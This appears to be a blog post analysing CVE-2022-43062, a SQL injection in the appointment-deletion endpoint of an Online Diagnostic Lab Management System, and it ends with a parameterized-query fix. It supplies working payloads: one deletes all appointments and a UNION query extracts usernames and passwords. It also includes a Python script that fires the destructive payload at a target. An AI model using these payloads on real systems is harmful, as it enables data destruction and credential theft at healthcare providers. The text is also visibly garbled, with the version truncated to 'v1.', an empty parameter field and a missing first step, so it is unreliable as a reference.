CVE-2022-43062 - SQL Injection Exploit in Online Diagnostic Lab Management System v1. (Full Analysis and Exploit Guide)

Security flaws in healthcare web applications can be disastrous, exposing sensitive data and allowing hackers complete control. In this post, we deep dive into CVE-2022-43062, a critical SQL injection vulnerability found in the Online Diagnostic Lab Management System v1.. This write-up explains the bug, demonstrates code snippets, offers a step-by-step exploit, and links to original references and documentation.

What is CVE-2022-43062?

CVE-2022-43062 is a security flaw discovered in the Online Diagnostic Lab Management System v1., specifically within the id parameter at /classes/Master.php?f=delete_appointment. The vulnerability allows attackers to inject and execute arbitrary SQL commands, potentially leading to data leaks, database destruction, or complete system compromise.

Affected Product:

Online Diagnostic Lab Management System v1.

Vulnerable Endpoint:  
- /classes/Master.php?f=delete_appointment  
Param:

How the Bug Works

The vulnerable code does not properly sanitize the id parameter before using it in a SQL query. As a result, any value supplied through this parameter is directly passed to the database.

Hypothetical Vulnerable PHP Code

// Master.php (function delete_appointment)
$id = $_GET['id'];
$sql = "DELETE FROM appointments WHERE id = $id";
mysqli_query($conn, $sql);

The above usage lets a malicious user inject malicious SQL into the query.

Given the code above, an attacker can manipulate the id parameter. For example

/classes/Master.php?f=delete_appointment&id=1

The query executed

DELETE FROM appointments WHERE id = 1

But if someone sends

/classes/Master.php?f=delete_appointment&id=1 OR 1=1

The query becomes

DELETE FROM appointments WHERE id = 1 OR 1=1

This instructs the database to delete all rows, because 1=1 is always true.

Step 2: Data Extraction with UNION

Suppose the attacker wants to extract usernames and passwords. By replacing the id parameter with a SQL injection payload like:

/classes/Master.php?f=delete_appointment&id=-1 UNION SELECT 1, user, password FROM users--

Assuming response output, this query might dump sensitive data to the attacker!

Step 3: More Advanced Payloads

Depending on the database privileges and table structure, the attacker could escalate further, such as reading arbitrary tables, running stacked queries (if supported), or even writing to the filesystem.

Example Exploit in Python

This code snippet demonstrates how an attacker could exploit the vulnerability to delete all appointments.

import requests

url = 'http://target-site/classes/Master.php';
payload = {'f': 'delete_appointment', 'id': '1 OR 1=1'}

response = requests.get(url, params=payload)
print('Status:', response.status_code)
print('Response:', response.text)

Warning: Only use this code in authorized pen-testing on systems you own/have permission to test.

Fixing this is straightforward: Always use parameterized queries! For example

$id = $_GET['id'];
$stmt = $conn->prepare("DELETE FROM appointments WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Also, validate and sanitize all inputs, and be cautious of GET parameters manipulating database actions.

References

- Original CVE record: CVE-2022-43062
- Exploit DB 51388
- OWASP SQL Injection Guide
- GitHub Source for Online Diagnostic Lab Management System

Conclusion

CVE-2022-43062 serves as an urgent reminder: never trust user input and always use prepared statements to interact with a database. If you use the Online Diagnostic Lab Management System v1., patch your code ASAP or restrict public access to these endpoints.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:58:00 UTC